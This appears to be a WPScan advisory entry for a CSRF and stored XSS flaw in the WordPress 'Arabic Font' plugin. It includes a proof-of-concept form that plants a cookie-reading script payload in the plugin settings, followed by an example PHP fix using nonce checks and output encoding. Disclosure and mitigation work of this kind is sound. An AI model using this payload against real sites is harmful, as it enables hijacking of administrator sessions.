Arabic Font - CSRF & Stored XSS


Description
The plugin's settings handler performs no CSRF check, and the values it stores are rendered back by arabic-font.php and /inc/panel.php without entity encoding. An attacker who gets a logged-in administrator to submit a crafted form can therefore store a script payload in the plugin settings, which then executes in the context of that admin user (stored XSS).
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>
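For defenders, an added example of how the two flaws described above are closed on the WordPress side; this is not the plugin's own code, and the function names, the af_settings option and the af_nonce field are assumptions. It pairs a nonce and capability check on save (CSRF) with esc_attr() on output (the AF_defaultcssclass payload can no longer break out of the value attribute).

```php
<?php
// Added example, not the arabic-font plugin's code. af_handle_save,
// af_render_form, the 'af_settings' option and 'af_nonce' are assumed names.

function af_handle_save() {
    if ( ! isset( $_POST['action'] ) || 'save' !== $_POST['action'] ) {
        return;
    }
    // Only administrators may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // CSRF mitigation: the request must carry the nonce minted by
    // wp_nonce_field() in af_render_form(); a forged or missing nonce dies with 403.
    check_admin_referer( 'af_save_settings', 'af_nonce' );

    $align    = wp_unslash( $_POST['AF_textalign'] ?? '' );
    $settings = array(
        'AF_fontfamily'      => sanitize_text_field( wp_unslash( $_POST['AF_fontfamily'] ?? '' ) ),
        'AF_fontsize'        => absint( $_POST['AF_fontsize'] ?? 0 ),
        'AF_lineheight'      => absint( $_POST['AF_lineheight'] ?? 0 ),
        'AF_textalign'       => in_array( $align, array( 'Left', 'Center', 'Right' ), true ) ? $align : 'Right',
        'AF_defaultcssclass' => sanitize_text_field( wp_unslash( $_POST['AF_defaultcssclass'] ?? '' ) ),
        'AF_customcss'       => wp_strip_all_tags( wp_unslash( $_POST['AF_customcss'] ?? '' ) ),
    );
    update_option( 'af_settings', $settings );
}

function af_render_form() {
    $s = get_option( 'af_settings', array() );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'af_save_settings', 'af_nonce' ); ?>
        <!-- Output encoding: esc_attr() turns " into &quot; and < into &lt;,
             so a stored value such as .arab"><script>... stays inside the attribute. -->
        <input type="text" name="AF_defaultcssclass"
               value="<?php echo esc_attr( $s['AF_defaultcssclass'] ?? '' ); ?>">
        <input type="hidden" name="action" value="save">
        <input type="submit" value="Save changes">
    </form>
    <?php
}

add_action( 'admin_init', 'af_handle_save' );
```

Input sanitisation alone is not the fix: even if a stored value slips through, esc_attr() at the point of output is what prevents the attribute break-out.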

Affects

Plugin arabic-font

References

URL https://www.rastating.com/arabic-font-1-2-csrf-stored-xss/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter rastating
Submitter Website https://www.rastating.com/
Submitter Twitter @iamrastating
Views 49
Verified No
WPVDB ID 8868

Timeline

Publicly Published 2017-07-20
Added 2017-07-21
Last Updated 2017-07-21

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.